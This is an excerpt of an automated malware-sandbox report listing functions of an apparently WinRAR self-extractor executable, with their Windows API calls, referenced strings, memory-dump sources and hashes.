Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
Instruction ID: 6a51f7e993836ff9b8ae7e0e4b55ae1997a9061d18e9c1520ba79df17c915e45
Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
Instruction Fuzzy Hash: 61112E30B19F4281FD946B04BD41276D2A16F097B5FC94435C81E47754FF7CE44CA620

Function 00007FF71612ED24 Relevance: 9.1, APIs: 6, Instructions: 120timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7161251A4: GetVersionExW.KERNEL32 ref: 00007FF7161251D5

FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF716115AB4), ref: 00007FF71612ED8C
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF716115AB4), ref: 00007FF71612ED98
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF716115AB4), ref: 00007FF71612EDA8
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF716115AB4), ref: 00007FF71612EDB6
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF716115AB4), ref: 00007FF71612EDC4
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF716115AB4), ref: 00007FF71612EE05

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
Instruction ID: 09e97e6380c88d83ee8b33d0b5fd5582f1e33eaf522ae29b64084d297099a75e
Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
Instruction Fuzzy Hash: 9B517CB2B00A51CAFB04DF79E8411ADB7B1F748798BA0403ADE0D57B58DB38E559C710

Function 00007FF71612F010 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32 ref: 00007FF71612F074

Part of subcall function 00007FF7161251A4: GetVersionExW.KERNEL32 ref: 00007FF7161251D5

LocalFileTimeToFileTime.KERNEL32 ref: 00007FF71612F096
FileTimeToSystemTime.KERNEL32 ref: 00007FF71612F0A2
TzSpecificLocalTimeToSystemTime.KERNEL32 ref: 00007FF71612F0B2
SystemTimeToFileTime.KERNEL32 ref: 00007FF71612F0C0
SystemTimeToFileTime.KERNEL32 ref: 00007FF71612F0CE

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
Instruction ID: bca81dbe2cfdf54ca925674f987554a847253ed4856afcc775357290b7e79822
Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
Instruction Fuzzy Hash: 0B313B66B10A51CDFB00DFB9E8811ADB771FF08758B94502AEE0E97A58EF38D499C710

Function 00007FF716127918 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716127C8C

Strings

.rar, xrefs: 00007FF716127969, 00007FF716127978
exe, xrefs: 00007FF7161279AF, 00007FF7161279BE
sfx, xrefs: 00007FF7161279F3, 00007FF716127A02
rar, xrefs: 00007FF716127A9B, 00007FF716127AAA, 00007FF716127B67, 00007FF716127B7C

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: .rar$exe$rar$sfx
API String ID: 3668304517-630704357
Opcode ID: 97aafd44a7caf21700e2098a6ceb5321661423453e734b1945fa1e7d2bcd8431
Instruction ID: ff6f01f10b450d42f9925a68d9d4fb02f847463e8c1812e9d0270672cf5cf3f3
Opcode Fuzzy Hash: 97aafd44a7caf21700e2098a6ceb5321661423453e734b1945fa1e7d2bcd8431
Instruction Fuzzy Hash: 70A1B322A14E1680FB00AB25FC452BBA362BF45BB4FA44239DD1D076E9DF3CD559D360

Function 00007FF716145CE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF716145D58

Part of subcall function 00007FF716145210: abort.LIBCMT ref: 00007FF716145223

_CallSETranslator.LIBVCRUNTIME ref: 00007FF716145DA3
abort.LIBCMT ref: 00007FF716145FD1

Strings

RCC, xrefs: 00007FF716145D74
MOC, xrefs: 00007FF716145D6C

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
Instruction ID: f71f87793ef591d19aa58365d0be07849f965e62872575c2da1914316aea9058
Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
Instruction Fuzzy Hash: 2291C173A09B918AF710DB65E8802AEBBA0FB04798F504139EF4C17B59EF38D199D710

Function 00007FF716144F80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF716144FAB
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF716145040
RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FF716142F5E), ref: 00007FF71614508F

Strings

f, xrefs: 00007FF716144FBE
csm, xrefs: 00007FF716145026

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
Instruction ID: bd212283907c8c42f90d16ef81b30177072b11e31c7b588a668cc129f287eaad
Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
Instruction Fuzzy Hash: 5151D835A15A4286F714EF15FC44A3AB765FB44BA8F908030DE1E47B48EF78E849D750

Function 00007FF71611CEE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF71611D03D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611D0D1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611D0D7

Part of subcall function 00007FF71611DE04: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF71611CF4B), ref: 00007FF71611DE27
Part of subcall function 00007FF71611DE04: GetLastError.KERNEL32 ref: 00007FF71611DE88
Part of subcall function 00007FF71611DE04: CloseHandle.KERNEL32 ref: 00007FF71611DE9B

Strings

SeRestorePrivilege, xrefs: 00007FF71611CF5E
SeSecurityPrivilege, xrefs: 00007FF71611CF3F

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 2102711378-639343689
Opcode ID: 87299e3d8371150436d20a5d335114172b85ee8c064b133af49689baa0f6dc88
Instruction ID: a6996e78b1ac89a09925ac2b21fbcfbf10256b44e929042fd125ac13b82d67e3
Opcode Fuzzy Hash: 87299e3d8371150436d20a5d335114172b85ee8c064b133af49689baa0f6dc88
Instruction Fuzzy Hash: 5F51A1A2E18F5285FA00FB75FC411BBA361AF557B4FC00135DE1D57696DE2CA889D220

Function 00007FF716137B28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

ShowWindow.USER32 ref: 00007FF716137B6F
GetWindowRect.USER32 ref: 00007FF716137BC0
ShowWindow.USER32 ref: 00007FF716137C96
ShowWindow.USER32 ref: 00007FF716137CC3

Strings

RarHtmlClassName, xrefs: 00007FF716137C4B

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Window$Show$Rect
String ID: RarHtmlClassName
API String ID: 2396740005-1658105358
Opcode ID: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
Instruction ID: 1ec83c400f75ec68b74d10c9221ff178d175c42f5235238e4fbf299225c7309b
Opcode Fuzzy Hash: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
Instruction Fuzzy Hash: 3F518322608F8286FA24EB25F84437BE7A1FB857A0F804435DE4E47B55DF3CE4499710

Function 00007FF71613FD0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32 ref: 00007FF71613FD43
SetEnvironmentVariableW.KERNEL32 ref: 00007FF71613FDBC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613FE1B

Strings

sfxpar, xrefs: 00007FF71613FDB5
sfxcmd, xrefs: 00007FF71613FD3C

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
String ID: sfxcmd$sfxpar
API String ID: 3540648995-3493335439
Opcode ID: 48e58e823320ee2e30a8ba7f247afa82eb81b269a21fe23b9d6641b37ea74fe4
Instruction ID: 045f7ab6739a3de5cb8c339719235e6f7fd970c8256b03c0465098cdafa3e3f5
Opcode Fuzzy Hash: 48e58e823320ee2e30a8ba7f247afa82eb81b269a21fe23b9d6641b37ea74fe4
Instruction Fuzzy Hash: 4C317072A14F1588FB00AB69F8841AEA371FB49BA8F940131DE5E177A9DF38D049D364

Function 00007FF71613FED4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 00007FF71613FF34, 00007FF71613FF99
RENAMEDLG, xrefs: 00007FF71613FF60

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
Instruction ID: 8507b42ed551188425dc43c23b82753dfe1b0d9d55f29e11fc758d80588f91bf
Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
Instruction Fuzzy Hash: DA211B26908F4784FA10EB19FC44176E7A4EB4ABB4F940036D98E47364DE3CE88CE364

Function 00007FF71614BFB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF71614BFD0
GetProcAddress.KERNEL32 ref: 00007FF71614BFE6
FreeLibrary.KERNEL32 ref: 00007FF71614C00B

Strings

mscoree.dll, xrefs: 00007FF71614BFC7
CorExitProcess, xrefs: 00007FF71614BFDF

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
Instruction ID: f55c5af282c14e16c31a7a8bdc507f89420a1d8d802e1d0bda345d92e6fb8641
Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
Instruction Fuzzy Hash: 33F03165A19E4281FE84AB15FC8027AE3B0AF887A4F851035DD4F47659DF3CD4889720

Function 00007FF7161545C0 Relevance: 7.7, APIs: 5, Instructions: 203COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF716154605

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
Instruction ID: 3686ea3b89d5565f0ba5473675d9919a64f87501eb3d06a5f12a299c8a14c6e6
Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
Instruction Fuzzy Hash: AD81E332F59E5285F750AB69AC406BEE6B0BB46BA4FC14135CD0E53699DF3CA409E320

Function 00007FF716123AF8 Relevance: 7.7, APIs: 5, Instructions: 164filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF716123BBB
CreateFileW.KERNEL32 ref: 00007FF716123C24
SetFileTime.KERNEL32 ref: 00007FF716123CEC
CloseHandle.KERNEL32 ref: 00007FF716123CF6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716123D2C

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2398171386-0
Opcode ID: 82f053c75c0f85402010483eccdcf8e864613be84fe09434e6a81e38387e2611
Instruction ID: bccdaebd527ca212548bfef2be1a4e604e3d8583b4f07996e2b041a6b215589c
Opcode Fuzzy Hash: 82f053c75c0f85402010483eccdcf8e864613be84fe09434e6a81e38387e2611
Instruction Fuzzy Hash: 3B51B162B14E4289FB50AF65FC402BEA372AB84BB8F904639DE1D466D8DE38945D9310

Function 00007FF716153F34 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF716154767), ref: 00007FF716153F91
WideCharToMultiByte.KERNEL32 ref: 00007FF71615406D
WriteFile.KERNEL32 ref: 00007FF716154093
WriteFile.KERNEL32 ref: 00007FF7161540D2
GetLastError.KERNEL32 ref: 00007FF71615410A

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
